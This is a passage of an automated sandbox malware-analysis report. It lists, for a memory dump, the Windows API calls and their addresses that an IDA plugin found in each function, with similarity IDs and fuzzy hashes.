                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 01019534
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 010195A5
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 01019604
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 01019677
                                                                                                                                                                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 010196A2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 010295F3
                                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0102961F
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01029677
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0102969C
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 010296A4
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0103999D
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 01039A2D
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 01039A49
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 01039A8F
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 01039AAF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01021A02,?,7644E610), ref: 00FCF9F1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,01010354,00000000,00000000,?,?,01021A02,?,7644E610,?,01010354), ref: 00FCFA18
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0104766B
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 01047682
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 010476AB
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0102B5BE,00000000,00000000), ref: 010476D0
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 010476FF
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00FB19E1
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00FB19FE
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00FB1A23
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00FB1A3D
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetInputState.USER32 ref: 01024310
                                                                                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 01024367
                                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 01024390
                                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0102439A
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010243AB
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 01012262
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 0101230E
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 01012316
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 01012327
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0101232F
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 010461E4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0104623C
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0104624E
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01046259
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 010462B5
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 010313AE
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 010313C5
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 01031401
                                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 0103140D
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 01031445
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00FED146
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FED169
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FED18F
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FED1A2
                                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FED1B1
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                        APIs
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _memcmp
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(0000000A,?,?,00FDF64E,00FD545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00FE3170
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE31A5
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE31CC
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00FE31D9
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00FE31E2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?,?,01010C4E), ref: 0101091B
                                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010936
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010944
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?), ref: 01010954
                                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010960
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0101F2AE
                                                                                                                                                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0101F2BC
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0101F2C4
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0101F2CE
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011A60
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A6C
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A7B
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A82
                                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01011A99
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 78b4fa03d5724f0f03f75b4e76b5984c84fa074cd2536a345f819f693d0b96d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9a1cb2d5f558ebb1b5986a42ffa6c9ae6638f328c16870082f6b7f97ef0e05e0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78b4fa03d5724f0f03f75b4e76b5984c84fa074cd2536a345f819f693d0b96d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF0181B9600205BFDB254FA8ED88D6A3FADEF882A4B210458FD85C3254DA36DC40CB60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01011916
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01011922
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01011931
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01011938
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101194E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 69a3a464636459f84c50ee4c1e469d97e993db54746a2e8a8fd093a079d2bf5c
                                                                                                                                                                                                                                                                                                        • Instruction ID: a832b8471ec82cdd4e27d9b0ccc0d21e274eb5cfe570606037f31fc8c7d188ab
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69a3a464636459f84c50ee4c1e469d97e993db54746a2e8a8fd093a079d2bf5c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23F062B9200301BBDB220FA9ED8DF563BAEEF897A1F104415FE85D7255CA79D8108B60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01011976
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01011982
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011991
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01011998
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 010119AE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 75a15c96e0a9cebcd2b7f06ea3c7ee263345fb25e70cb6bee6a6e0196042cbd0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7506b3d1e1ea5348a3bb01abbf2c9acb3135c09a886aed86b1ed82212df4d1c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75a15c96e0a9cebcd2b7f06ea3c7ee263345fb25e70cb6bee6a6e0196042cbd0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2FF062B9200301BBD7224FA8ED89F563BAEEF896A1F100414FE85C7255CA79D8108B60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CCB
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CD8
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CE5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CF2
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CFF
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020D0C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c54f87253ee97c01304dc245f7873687786a940b50e5e34cffd7f72fdf529cc6
                                                                                                                                                                                                                                                                                                        • Instruction ID: ffaecd406d369f09fc7c8750ec05ac452417ed3935096463087782279f6eb358
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c54f87253ee97c01304dc245f7873687786a940b50e5e34cffd7f72fdf529cc6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2701A2B1801B29DFDB30AF6AD980816FBF5BF502153258A7FE2D652921C7B1A944DF80
                                                                                                                                                                                                                                                                                                        APIs
